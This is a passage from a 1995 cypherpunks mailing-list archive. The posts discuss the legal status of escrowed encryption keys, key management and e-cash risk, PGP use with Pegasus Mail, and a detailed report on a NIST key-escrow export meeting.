> > in a violation of law.  Alice can't invoke Bob's rights against 
> > self-incrimination for obvious reasons:  Alice isn't Bob.
> > ^^^^
> 
> You've taken the narrow answer I was trying to give out of context.
> As for fifth amendment questions, That's another discussion entirely.  If 
> this was not an error, then you have still taken the question way beyond the
> narrow scope I was addressing.

You are correct:  I didn't realize/remember/whatever that you were 
limiting the remarks to the narrow scope you set forth below.
And on the point you were addressing, I agree with you.

Sorry to have added the fog ...

EBD

 
> I was answering only as to how the manifestation of Bob's privacy
> interest might impact the argument that the key was no longer a protected 
> interest acording to the Smith v. Maryland ruling, and thus unprotected 
> by the fourth amendment on those grounds.  (Assuming it would even be
> applied to the Bob - Alice relationship in terms of crypto keys).
> 
> Your statement "Bob's Fourth Amendment rights are not triggered by his 
> contract with Alice."  Is probably correct in the event the key is 
> obtained from Alice.  It may not be if the key is obtained by electronic 
> measures or otherwise without a warrant and then the argument is made 
> after the fact that Bob has exerted no expectation of privacy over the 
> key.  This is the key question which bears on the key escrow's 
> effect on Bob's protection (Alice in that example being the escrow 
> agent).  Clearly Alice in that circumstance is unlikely to give up the 
> key without a warrant.  The real worry is that the authorities are given 
> free reign to obtain the key by other methods from Bob, or Bob's 
> communications without a warrant by the mere fact that Bob has "tendered" 
> the information to Alice (the escrow agent).
> 
> Again, I'm addressing the narrow issue of voluntary surrendering of key 
> information to an escrow agent and it's effect on the 'third party' 
> rule in Smith v. Maryland, not the eventual outcome of an exclusionary 
> hearing.
> 
> > EBD 
> > 
> > Not a lawyer on the Net, although I play one in real life.
> > **********************************************************
> > Flame away! I get treated worse in person every day!!
> 
> ---
> My prefered and soon to be permanent e-mail address: unicorn@schloss.li
> "In fact, had Bancroft not existed,       potestas scientiae in usu est
> Franklin might have had to invent him."    in nihilum nil posse reverti
> 00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
> 
> 

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame away! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 9 Dec 95 23:47:40 PST
Subject: Re: Is there a lawyer in the house?
In-Reply-To: <Pine.BSF.3.91.951210023002.18670G-100000@mercury.thepoint.net>
Message-ID: <Pine.SUN.3.91.951210024748.3597C-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


 Brian Davis wrote:
> > 
> > > On Fri, 8 Dec 1995, Black Unicorn wrote:

> > You've taken the narrow answer I was trying to give out of context.
> > As for fifth amendment questions, That's another discussion entirely.  If 
> > this was not an error, then you have still taken the question way beyond the
> > narrow scope I was addressing.
> 
> You are correct:  I didn't realize/remember/whatever that you were 
> limiting the remarks to the narrow scope you set forth below.
> And on the point you were addressing, I agree with you.
> 
> Sorry to have added the fog ...

Not a problem
I could have been clearer.

> Not a lawyer on the Net, although I play one in real life.
> **********************************************************
> Flame away! I get treated worse in person every day!!

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp" <ecarp@netcom.com>
Date: Sun, 10 Dec 95 01:05:18 PST
To: cypherpunks@toad.com
Subject: Whew!
Message-ID: <199512101007.EAA23520@khijol>
MIME-Version: 1.0
Content-Type: text/plain


I just finished leafing through Schneier's "Applied Cryptography", 
second edition.  Lots of new stuff, good and very thorough coverage 
of protocols and implementations, including weaknesses and processes 
behind same.  If an idiot like me can understand this stuff (and if 
you don't believe I'm an idiot, just ask Perry), anyone can.  I 
highly recommend the book, it's an absolute bargain at $50 USD.

Should be required reading for anyone before being allowed to post 
here. :)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@darkwing.uoregon.edu>
Date: Sun, 10 Dec 95 03:10:18 PST
To: cypherpunks@toad.com
Subject: Re: GAK and self-incrimination?
Message-ID: <199512101057.AA07992@ideath.goldenbear.com>
MIME-Version: 1.0
Content-Type: text/plain



Tim May writes:

>Consider this hypo: I send an encrypted message to a partner in crime
>containing plans for future crimes and descriptions of past crimes. I don't
>GAK the message. The government prosecutes me under the Anti-Terrorism and
>Child Protection Act of 1997.
>
>My defense? That GAKKing the message would be tantamount to incriminating
>myself, which the Fifth Amendment protects me against.      

The Fifth protects you against *compelled* self-incrimination - in
particular, the right to be free from the "cruel trilemma" of

        o       conviction of a substantive crime, based on your
                (true) testimony
        o       conviction of perjury, for lying when asked to incriminate
                yourself
        o       contempt of court sanctions, for refusing to answer

but your hypo doesn't seem to create that forbidden situation. In
particular, you're free to simply not send the message at all. 

(this message, sent from my Windows box, isn't PGP signed. Doh. signatures
will return when the Unix box is net-functional again.)
--
"The anchored mind screwed into me by the psycho-    Greg Broiles
lubricious thrust of heaven is the one that thinks   
every temptation, every desire, every inhibition."   greg@goldenbear.com
	-- Antonin Artaud		   gbroiles@darkwing.uoregon.edu





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daw@lagos.CS.Berkeley.EDU (David A Wagner)
Date: Sun, 10 Dec 95 00:25:37 PST
To: cypherpunks@toad.com
Subject: Re: Still more on the Digicash protocol
Message-ID: <199512100823.DAA05954@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <Pine.3.89.9512081312.A23124-0100000@unicorn.com>,
Rev. Mark Grant <mark@unicorn.com> wrote:
> 
> Exactly.. once you have an active attack set up, it's trivial, but setting
> that up is quite hard. 
> 

But before everyone pats themselves on the back, congratulating themselves
on how hard an active attack is to set up, look at

http://www.EnGarde.com/software/ipwatcher/

Yes, folks, a commercial program which mounts an active attack.

(Check out the GUI!  Click on the `Watch Mail' control!  Activate the
`Take over' button!  Whee, mom, hacking is fun!)

Active attacks may not be trivial, but they aren't exactly rocket science,
either -- and they're for sale.

- -- Dave `is capitalism the best thing since sliced bread, or what?' Wagner
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMMqY/ioZzwIn1bdtAQEkGQF/WdJBqbP5HwTDxldi0UDCmP2RZAFz5p2q
cPMSoOIgkFbaBS34k4LSFPKcvegw3tJk
=Ptyf
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp" <ecarp@netcom.com>
Date: Sun, 10 Dec 95 02:12:00 PST
To: Adam Shostack <jimbell@pacifier.com
Subject: Re: More FUD from First Virtual
Message-ID: <199512101114.FAA26720@khijol>
MIME-Version: 1.0
Content-Type: text/plain


> From:          Adam Shostack <adam@homeport.org>
> Subject:       Re: More FUD from First Virtual
> To:            jimbell@pacifier.com (jim bell)
> Date:          Sat, 9 Dec 1995 16:51:58 -0500 (EST)
> Cc:            cypherpunks@toad.com

> jim bell wrote:
> 
> [Good points about cost of transactions deleted]
> 
> | The answer, I think, it that there would be no problem finding people to
> | take that risk in exchange for the return, ESPECIALLY if they have some
> | input into the design (level of security) of the system.  They might insist
> | on 2048-bit RSA keys, instead of 1024-bit, for example.
> 
> 	(I know its only an example, but...)
> 
> 	Key length is not what is needed for better security; more
> solid code and better interfaces are needed.  (I might also argue for
> hardware keys that are more difficult to steal..)

Nonsense.  The code is pretty solid, the interfaces aren't very 
difficult.  What is needed is better human management of keys.  Why 
brute-force, why look for weak keys, why bother calculating how much 
safer 2047-bit keys are rather than 1024-bit keys when someone can 
look on your HD and find your secret key, when they can open your 
desk drawer and find your pass phrase or password, when they can 
guess that you used your wife's maiden name as your password?

Adam, I don't understand why you wrote nonsense in the first 
paragraph, then followed it up with textbook attacks such as:

> 	Cryptosystems fail because of bad storage of keys, coding
> mistakes, accidentally writing passphrases to disk during a swap, etc.
> Moving to 2048 bit keys is no help if you lose the key to a
> non-cryptanalytic attack.  Moving to keys with a week or day lifetimes
> might be better.  

Moving the systems which automatically issue key revocation 
certificates, and coupling that with a wide distribution system would 
be the perfect match to such a scheme.  Of course, that means that 
PGP et. al. needs to be more tightly integrated into existing mail 
software.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Adam Hupp" <ahupp@primenet.com>
Date: Sun, 10 Dec 95 13:54:09 PST
To: cypherpunks@toad.com
Subject: Re: Warning about Pegasus Mail and PGP (fwd)
Message-ID: <199512102154.OAA16694@usr4.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Where can you get the Open Encryptor PGP interface?

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6

mQBtAzCNppQAAAEDALhWZl7IuGZ9zZT5bACo0b/1L0Nv0C72vKHIO3IHh+cwpHHa
2Ozb9aeO0UvXGwkkZIYgUm0EvmzKh7yb1GTLvBp5kXpR3I9w+Yj4LGlBDERpUWw6
x4ED49pwDnz1Hl5FBQAFEbQYYXNoIDxhaHVwcEBwcmltZW5ldC5jb20+
=PtJK
-----END PGP PUBLIC KEY BLOCK-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Sun, 10 Dec 95 01:24:57 PST
To: Daniel Miskell <DMiskell@envirolink.org>
Subject: Re: The Elevator Problem
In-Reply-To: <9512100703.AA27209@envirolink.org>
Message-ID: <Pine.3.89.9512100456.A16028-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Sun, 10 Dec 1995, Daniel Miskell wrote:

> There is an easy way to develop a secret key in front any number of eves, be 
> they experts or not, without the eves knowing what the key is.  Even if they 
> tap your phone/comm line, ect.  There was an article in Discovery Magazine a 
> couple of years ago, talking about how to use photons and their randomness as 
> the perfect, uncrackable code.  Use of the photons aside, there was a key 
> generation method discussed, simple, yet secure enough to work out on a tapped 
> phone.  Let me root around.

You must mean quantum crypto, by G. Brassard and C. Crepeau of U de Montreal.
Requires a direct fiber optic line from pt. A to B, in order to be 
secure, if I am not mistaken. Which makes it impractical for most people, 
as there are usually switches (or whatever they're called) and more than one 
line in between. Lets you use OTPs with your next-door neighbor though.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Fred Nix" <FredNix@msn.com>
Date: Sat, 9 Dec 95 22:20:46 PST
To: "'cypherpunks@toad.com>
Subject: anonymous remailer
Message-ID: <UPMAIL03.199512100623550668@msn.com>
MIME-Version: 1.0
Content-Type: text/plain


Hey...

   How do I gain acess to the remailer?

Thanks!

Fred Nix




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jeff Hupp" <jhupp@novellnet.gensys.com>
Date: Sun, 10 Dec 95 06:30:26 PST
To: cypherpunks@toad.com
Subject: Re: Warning about Pegasus Mail and PGP (fwd)
Message-ID: <3521BB467F3@Novellnet.Gensys.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On 10 Dec 95 at 12:30, Anonymous wrote:

: On  9 Dec 95 at 21:43, Jeff Hupp wrote:
: 
: > On  9 Dec 95 at 18:29, Siberia wrote:
: 
: > : Okay, here's how I understand things with PGP and Pegasus.
: > : You have two  options with Pegasus depending on the set-up
: > : options you choose.  You can either send upon completion of
: > : your out-going email, or you can have your mail queued
: > : until you press the send out-going mail button.  The actual
: > : PGP process does not occur until you actually send the
: > : mail.  So the answer would be: don't queue your mail.
: 
: > 	That's not really a solution in the Windows environment, if
: > you have a swap file, you never know what gets written out
: > to it.  The solution is run w/o a swap file or run an
: > encrypted file system.  I run an encrypted file system.
: 
: Oh, PLEASE! Do you HAVE to go and mix up two completely
: different issues? Aren't the nontechnical people trying to
: follow these things likely to be confused enough without your
: adding to that confusion? For every person who really 
: understands the technical issues there are probably a thousand 
: or ten thousand who are just trying to *use* the stuff without 
: stepping into a deep hole.
: 
: An OS swap file is one kind of hole.  What Siberia is writing 
: about is ANOTHER type of hole. If I wipe my swap file after 
: each use of my machine and don't know that Pegasus is doing 
: this, or think that because of what you wrote I'm no worse off, 
: I've been done a serious disservice.]

	So, I shouldn't take the opportunity to tell those non-technical people 
about the other "hole" they most likely have?  After all this only 
effects Windows users and it is a problem with windows.

	Read what I wrote, I did not say the original post was in error about 
not queuing mail and saw no reason to repeat what appears to be a fact. 
And, if the non technical people don't know about the swap file 
problem, and just assume that if they don't queue mail they are no 
worse off then they have been don a serious disservice.

	BTY, did you check it out?  Or just take what you saw as an 
opportunity to rant?

: 
: > 	Pegasus will indeed save your key with your message in the
: > outgoing queue.  This is a problem with the design of
: > pegasus, not with the design of the add on encryptor.  
: 
: How about saying something USEFUL, like yes or no to the
: question of whether sending WITHOUT queueing will make any
: difference? How about agreeing that if David Harris hopes to
: provide a useful interface to external "encryptors" he will
: have to do something about this?  How about cc'ing David?
: 
: Somebody else could as well point out that we're all full of 
: crap because we don't use Amigas, and while he might have a 
: point, it wouldn't be a very useful one.
: 

	Yes, it would have been a WONDERFUL opportunity to drop a O/S v. O/S 
troll on the list, notice I didn't.

	What I did do, was write up a problem description and mail it to David 
Harris.  This based on the likelyhood that he doesn't read cypherpunks.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMMrgqTUjeCeeebC9AQG3gwf/VdD9J/KJ1Tau3/L8BLoZ1v6ACAc93zcP
4F1MDoeX7EMSjWqGFZvsh0ev9hgciXvId9lu7tfMqIXQdolHzjXiyPXaw3qEa1Id
A80j+Z7OKB9RSz9LKHQqjrrqpANDbJ16LIztYW5r9YjMSntWX9OF7MzeZ0BJRYc4
d1oWnhHqnF6K9rX2XWDveXyQJgCnu2sZw6nNXi0V61OdhBc/QmPsjBp+u7aig+i8
vdC7EJh2znKsNqlQqiJmHnfTbGuoVZGQkc/71hpD2reLzcU7W/NQwM7rL4PFGyDg
QA15LXcfKsp6p0JCdZc+bvUfpH5mQQFWm4kd6sY7knjO3fKuTc7jpg==
=Li0A
-----END PGP SIGNATURE-----
-- 
JHupp@gensys.com           |For PGP Public Key:
http://gensys.com          |finger jhupp@gensys.com
A generation which ignores history has no past - and no future.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Sun, 10 Dec 95 05:58:01 PST
To: jim bell <jimbell@pacifier.com>
Subject: Re: More FUD from First Virtual
In-Reply-To: <m0tOVMF-000927C@pacifier.com>
Message-ID: <ckmiLlOMc50eE2isEP@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


I think Adam's already covered the red herring of key length.   You can
use 4-billion-bit keys and it won't help prevent an attack based on
stealing secret keys.

Ed Carp hit the nail on the head when he wrote:  

> What is needed is better human management of keys.  Why 
> brute-force, why look for weak keys, why bother calculating how much 
> safer 2047-bit keys are rather than 1024-bit keys when someone can 
> look on your HD and find your secret key, when they can open your 
> desk drawer and find your pass phrase or password, when they can 
> guess that you used your wife's maiden name as your password?

What some people seem to miss is that, in the absence of hardware keys
(which I believe is the only workable long term solution for mass-market
cryptography), this sort of thing is just plain too easy.  If a Windows
cryptoprogram stores its secret keys in a known location, I can write a
Windows virus that flies through the net and steals zillions.  If the
program insists on making the users insert a floppy every time, the
program's perceived usability will go through the floor, and people will
find workarounds.  In any event, I could write a virus that sits in
front of the e-cash program and steals your keys when next you run the
e-cash program.  Software's just too easy to fool.  That's why I regard
the risk of catastrophe as being fairly large in software-based e-cash
schemes.

Jim, I never denied that some banks would be willing to take the risk
(in fact, read my post, I said just the opposite).  What I said was that
the assumption of the risk would carry a significant underwriting cost,
which would be, in essence, the "cost of anonymity" when comparing
payment systems.  

Finally Jim writes:

> Your arguments seem to only be qualitative, not quantitative.  Maybe that's
> why the other guy calls them "FUD."  

I'm saying that there will be a high underwriting cost for anonymous
cash, and that this will make it much more expensive than non-anonymous
payment systems.  To my mind, that's a discussion about quantity of
costs, not quality.  If you want me to give you numbers, I'm sorry, but
I can't -- I'm not a banker or an actuary, and a lot of leg work would
be required to come up with a precise number in any event.  If I were a
banker, however, I think I'd be too conservative to underwrite e-cash at
any price, and would suggest that you find a less risk-averse banker.  
-- Nathaniel
--------
Nathaniel Borenstein <nsb@fv.com>       | (Tense Hot Alien In Barn)
Chief Scientist, First Virtual Holdings | VIRTUAL YELLOW RIBBON:
FAQ & PGP key: nsb+faq@nsb.fv.com       | http://www.netresponse.com/zldf




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aq068@detroit.freenet.org (Troy M. Walsh)
Date: Sun, 10 Dec 95 07:37:35 PST
To: cypherpunks@toad.com
Subject: anti-copy
Message-ID: <199512101537.KAA04258@detroit.freenet.org>
MIME-Version: 1.0
Content-Type: text/plain




How would it be possible to create files that KNOW they are 
a copy?  I don't mean ones that look at the mod date, but a 
system that is near fool-proof.
	Just something I've pondered...

		Daark




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Daniel Miskell <DMiskell@envirolink.org>
Date: Sun, 10 Dec 95 07:51:40 PST
To: s1113645@tesla.cc.uottawa.ca
Subject: Re: The Elevator Problem
Message-ID: <9512101551.AA02550@envirolink.org>
MIME-Version: 1.0
Content-Type: text/plain


s1113645@tesla.cc.uottawa.ca writes:
>
>
>On Sun, 10 Dec 1995, Daniel Miskell wrote:
>
>> There is an easy way to develop a secret key in front any number of eves, 
>>be  they experts or not, without the eves knowing what the key is.  Even if 
>>they  tap your phone/comm line, ect.  There was an article in Discovery 
>>Magazine a  couple of years ago, talking about how to use photons and their 
>>randomness as  the perfect, uncrackable code.  Use of the photons aside, 
>>there was a key  generation method discussed, simple, yet secure enough to 
>>work out on a tapped  phone.  Let me root around.
>
>You must mean quantum crypto, by G. Brassard and C. Crepeau of U de Montreal.
>Requires a direct fiber optic line from pt. A to B, in order to be 
>secure, if I am not mistaken. Which makes it impractical for most people, 
>as there are usually switches (or whatever they're called) and more than one 
>line in between. Lets you use OTPs with your next-door neighbor though.

I think i was misunderstood.  I was not referring to the actual use of light 
in the communications process.  I was talking about the key generation method 
suggested in that article.  Of course the use of light is impractical for most 
- the need for direct fiberoptics aside, you have to be able to test a photon 
for its polarized orientation.  In any case, i dig on.

Regards,
Munster.

---
_________________________________
*!Cheese Doctrine:!*
    Though cultured over time,
and aged to perfection, one must
not yield to produce mold.  One
must also not belittle themselves
by conforming to the "whiz", but
melt over the unprocessed ideas
of Ghuda.
_________________________________






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pfarrell@netcom.com (Pat Farrell)
Date: Sun, 10 Dec 95 11:07:21 PST
To: pfarrell@netcom.com
Subject: NIST GAK meeting writeup, LONG part 3 of 3
Message-ID: <199512101904.LAA20587@netcom3.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

NIST Key Export meeting, December 5, 1995 Long version 
Part 3 of 3.

This covers the notes on agent criteria, and the 
industry presentations. 

Part 2 of three hasn't been written, it is supposed to 
address the issues related to interoperability. I 
decided it was better to get this part out than to 
wait.

Items on the criteria themselves that I think were under 
reported in my first reports:

Ed Appel: the LEA's are very interested in Criteria #5 
(two ended decryption) as they have more than 100 
international offices.

Miles Smid described a trick for meeting Criteria #5, 
if you encrypt the session key with your own public 
key, in addition to the key of your destination, and 
if you have escrowed your private key with an Escrow 
Agent, then nearly any approach meets criteria #5.

   *********
On agent criteria:
   *********

Geoff G. says that the discussions on agent criteria 
are simply a follow-on to the main criteria #3.
The criteria themselves have been spam'd to the list.
They are also available at url:
<a href="http:/www.isse.gmu.edu/~pfarrell/nist/escagent.html">

There was a lot of reactions to the SECRET clearance
requirement, which they claimed was to handle
secure investigations (e.g. FISA). This has already
been discussed on the list, so I'll skip it here.

David Lesher asked a series of questions concerning 
the requirement that the Key Escrow Entity employ a 
person with a SECRET clearance. They included: what 
agency will issue the clearance? Who will authorize 
for the BI (background investigation)? Who will pay 
for it? Who does the existing RBOC clearances? Geoff 
dodged nearly all of them. He acknowledged that "they" 
will have to pay, but made no effort to define who 
"they" are.

Geoff said that they may want legislation support for 
protecting against illegal release of keys, failure to 
release, etc.

A fair number of the agent criteria would be considered
professional business practice (no single point of
failure, dual locations, etc.) if you thought that
escrowing keys was a good thing.

  *********
User/Industry presentations

Bill Sweet of TIS

Bill gave a presentation about his CKE product, and 
how hard he is working to "find a global solution."

This is actually the same product that Bill talked 
about in September when he worked for National 
Semiconductor. It was impressive then (private keys 
are NOT escrowed, only session keys, etc.) and is 
still not approved for export.

Bill talked about "information owners," they 
ultimately decide which security systems get deployed 
"in spite of various government requirements around the 
world." He said that "if rational key escrow systems 
are not offered, or do not adequately protect their 
information, owners will use unescrowed encryption 
from whatever sources available (Germany, et al)."

Bill talked about a UK University (Royal Holloway) 
study on UK/European needs for key escrow. He said 
that there was a lot of overlap with the NIST 
criteria, but that there were criteria that were 
judged as totally unacceptable. The first and loudest 
finding was:

"the use of the scheme should provide visible benefits 
to the user."

This begs the obvious question, what 
visible benefits to the user does GAK bring?

Two other interesting findings in the study were:
- - An entity with a warrant should not be able to 
  fabricate false evidence."
- - Abuse by either side should be detectable by the 
  other.

He suggested that these criteria be added to the NIST 
list of 10.

Bill went on to look at the NIST criteria. He said, 
concerning Criteria #3 (agents certified by US 
Government or reciprocal agreement), that "this is a 
show stopper!" because:
- -- no reciprocal agreements exist today, anywhere.
- -- what about countries where justice systems are 
   different, and what about where "these agreements are 
   not desirable (e.g. Nigeria, Mexico, Saudi Arabia, 
   Argentina, Poland, etc.)?
- -- even for NATO countries, agreements will be 
   different (Germany has data privacy laws, in Greece), 
   or we may not want to be reciprocal (in Greece, the 
   government likes to bug the opposition)

He also says that Criteria #7, 64-bit keys, is 
unacceptable. CE Infosys currently sells a PCMCIA (PC 
Card) encryptor that does triple-DES at T1 speeds. TIS 
uses it, and sells it in the US. [as an aside, I was 
told that they can import and resell them, but when 
one breaks, TIS can't ship it back to Germany for 
repairs. Sigh.]

Sweet had two recommendations:
- -- develop a tiered crypto policy, with hardware and 
   software under differing levels of rules,
- -- allow a pilot project, where TIS can sell VPN 
   (virtual private networks) using strong encryption. A 
   VPN is the use of the Internet as a private network 
   for a corporation by adding appropriate firewalls, 
   encryption, etc.


It seems to me that while TIS' CKE doesn't meet the 
criteria, it could be made to, with a few changes.
They've have to change the design to allow GAK
for any one target. (Criteria #5) This would mean
for generating one DRF (ie., LEEF) for each recipient 
as well as for the sender (as opposed to just for 
the sender) The neat thing about CKE is that each 
LEEF holds only the session key -- so you never 
give away your private key. (I think the govenment
really expects that we'll be willing to 
escrow our private keys. Fat chance!)

But this is a bit of a catch 22, because 
to follow all the criteria, you can't stop there.

- -- For each encryption, you generate a DRF for the 
   sender and each recipient

- -- For each DRF generated, you must have and check 
   a certificate chain for the chosen DRC and 
   refuse to encrypt unless all recipients and 
   the sender have validly certified (ie., USGovt
   approved) DRC public keys.

- -- Each receiving application must refuse to 
   decrypt unless every other recipient and 
   the sender have validly certified DRC
   public keys. This gets into the interoperability
   issues that I need to write up...

- -- I don't know how they can meet the revised #6. It
   seems to be designed specifically to break CKE.

To get govie approval, each DRC needs to meet all the
key escrow agent entity criteria. I'm really not at
all convinced that it is actually practical. This is
sad, because CKE is obviously designed with the spirit
of the government at heart, with just some modifications
to make it marketable. Guess TIS needs an Ireland office 
too.


Ken Mendelson of TIS

Ken gave a solid presentation describing how all of 
the Government's need for data about key escrow agents 
could be met with a commercial "vendor registration" 
approach instead of a Government mandated 
"certification" scheme. This would be in keeping with 
the current "spend less money, have less government 
bureaucratic rules" political climate. I have copies 
of his slides, I'd rather not type them in. With any 
luck, he'll put them up on the TIS web site url: 
http://www.tis.com

Dorothy Denning of Georgetown University

Dorothy Denning gave a presentation on an article that 
will be published in the March 96 Communications of 
the ACM. It analyzes currently available products (and 
vapor products) and sees how well they meet Criteria 
#5. It says that eight of the sixteen approaches that 
she surveyed currently meet Criteria #5. She lists her 
web page as http://www.cosc.georgetown.edu/~denning, 
but as of Sunday 12/10, the text is not available.

Melanie Janin, US Council for International Business

Ms. Janin's speech presented the US Council for 
International Business' comments on GAK. They are a NY 
based trade group, representing 300 clients. They 
don't like GAK. She called for a coherent policy on 
all encryption. Major topics in the presentation 
include:
- - free choice
- - open to the public
- - international acceptance
- - flexibility of implementation
- - User key management
- - Key escrow (where they "embrace key escrow as one 
  possible method of managing encryption keys.")
- - Liability

Ed Scheidt, Tecsec

Presented both comments on the criteria and his 
company's VEIL and Export VEIL Version 2.0 products. 
He raised a number of points, including:
- - how do we protect our commercial information unless 
  we have the best cryptography?
- - we need "constructive key management technology" to 
  manage keys, key splits, and different algorithms for 
  extended data separation.
- - solution must address issues such as international 
  trust in a key escrow.

He said that his "Export VEIL 2.0" product meets "the 
intent of 11/95 export criteria today."

Daniel Weitzner of CDT

Mr. Weitzner agreed to shorten his presentation so 
that he could yield some time to VTW.

He opened by pointing out that while the schedule had 
both him and Jerry Berman were supposed to talk, Jerry 
was too busy to make the meeting. "Jerry is out 
defending pornographers, so I'll be here defending 
terrorists."

I expect that his text will be on CDT's webpage, url: 
http://www.cdt.org. I'll just enter the key points.

The first thing he said is that "this is the wrong 
forum" and that "the [NIST] process will not work." He 
proposed a open, privately sponsored forum to develop 
alternatives that will work.

"The NIST proposal will not provide adequate security, 
privacy, promote secure communications worldwide, or 
guarantee user privacy." Major issues are:
- - Inadequate security
- - No viable policy framework for the long-term
- - Hinders the deployment of globally interoperable 
  secure systems
- - not necessarily voluntary
- - not viable in the marketplace
- - no constitutional privacy protections
- - will not meet the needs of law enforcement, since it 
  will "not deny criminals or terrorists access to 
  strong encryption, the stated objective of the 
  policy."

Shaber Safdar, Voters Telecommunication Watch

Described the results of an Internet-based, non-
scientific survey that the VTW recently made. Not 
surprisingly, those who replied were overwhelmingly 
against the NIST proposal. I don't have the slides, 
but VTW has a website with most of their information. 
The url is http://www.vtw.org

There were 26 respondents to the survey. 24 out of 26 
said that they would never buy products with law 
enforcement access. 16 out of 24 are already using 
security products.

He described a Technology Pledge that VTW is 
presenting to politicians (available at url: 
http://www.vtw.org/pledge/) and stated that Rep. 
Ronald Wyden (D-OR) signed the pledge with pro-
freedom, pro-market answers.

David Sobol, EPIC

As expected, EPIC doesn't like much about the NIST 
proposal. Their comments are on their web page, url:
http://www.epic.org/crypto/EPIC_Statement.html

A key statement is "Given the reality that users are 
unlikely to adopt key escrow systems on a voluntary 
basis, we believe that the current policy will result 
in the eventual prohibition of non-escrowed products. 
Indeed, documents released to EPIC under the Freedom 
of Information Act (FOIA) reveal that NSA and FBI 
concluded nearly three years ago that

	'Technological solutions such as they are, will 
     only work if they are incorporated into all 
     encryption products.'"

Major points 
- --Public comment is frequently solicited but never 
  heeded.
- --Relevant information has not been released. 
- --The proposal conceals the attempt to expand 
  wiretapping capability 

As a result, EPIC proposes the following Policy 
Recommendations

- --Relax export controls on encryption and permit the 
  free flow of encryption products across national 
  borders
- --Withdraw FIPS 185 (the Clipper standard for voice, 
  fax,...  and low speed data networks in the 
  federal government)
- --Remove "cryptology" from items that may be 
  classified ...  under executive order
- --Do not fund the Telephone Carrier Compliance Program         
  (the "Digital Telephony" proposal)
- --Do not permit the use of classified algorithms for         
  public networks
- --Examine the activities of the National Security 
  Agency ... since passage of the Computer Security 
  Act of 1987.

NOTE: during Mr. Sobel's discussion, a FBI 
representative sitting at the head table said  that 
the issues addressed by key escrow are "not just 
wiretapping, they include search and seizure of all 
stored media." I was not able to identify the person. 
He was sitting at Ed Appel's seat, but did not have a 
namecard. No one sitting near me recognized him 
either.

Padgett Petersen, Lockheed Martin

Noted Internet personality, Padgett Petersen took a 
rarely held position, he spoke as a Security officer 
of Lockheed Martin, rather than speaking as a private 
net-citizen.

He said that "these criteria are acceptable and can be 
made to work." He also said that "without US 
agreements, there is no reason to be concerned with 
export." Lockheed Martin was looking forward to 
participating in using and buying the escrowed 
products that will hit the market as a result of this 
process.

Robert Hollyman, Business Software Alliance

Mr. Hollyman said that "the facts are clear, companies 
are unanimous against" the NIST proposal. His members 
agree that:
- - security is critical
- - 40 bit is not viable
- - the 1992 government review requires a change in 
   policy.

He recommended:
- -- immediate approval of DES or equal strength 
   alternative for export.
- -- encourage companies to build encryption software by 
   submitting code to NIST (under non-disclosure) for 
   review
- -- add two bits ever three years to allowable key 
   lengths in recognition of Moore's law. He called this 
   a COCA allowance (cost of cracking algorithms).
- -- removal of restrictions on interoperability because 
   they are artificial and antithetical to the Global 
   Information Infrastructure.

He stated that the current criteria are vague, and 
will take years for approval. Yet he notes that in 
industry, the average life cycle of software is 18 
months.

Alex McIntosh, PC Security

PC Security sells key management systems. Shell is a 
customer. He addresses a couple of areas that his 
commercial customers ask. 

The first question is "why encrypt?" He said that the 
answer is to protect confidential data. These data 
include email, PC files, and archival data. 

This leads to the obvious question, why use key 
management? The two separate answers are to have  
operational backup and to allow compliance with 
internal and external law enforcement.

He said that he has a surprise for the NIST folks 
concerning key escrow agents. The corporate customer 
is the key escrow agent.

Other key observations:
- -- Companies, such as Shell, often do business in 
   countries where they can not trust the government.
- -- Shell handles over a million email messages a day. 
   This defines engineering requirements for any system 
   to meet.
- -- Liability is a huge issue, and the amounts are 
   huge. Geologic information, market strategies, etc. 
   are worth staggering amounts of money. The "US 
   Government can NOT cover Shell's liabilities."

Doug Miller, Software Publishers Association

Mr. Miller said that his members need immediate relief 
from the current encryption export policies. "our 
members are poised, but cannot leap, because of the 
barriers that U.S. cryptographic policy continues to 
impose." He wants to be able to export 56-bit DES. His 
position paper says, "we believe the discussion should 
also include assessment of the exportability of 
products employing the DES algorithm. DES-strength 
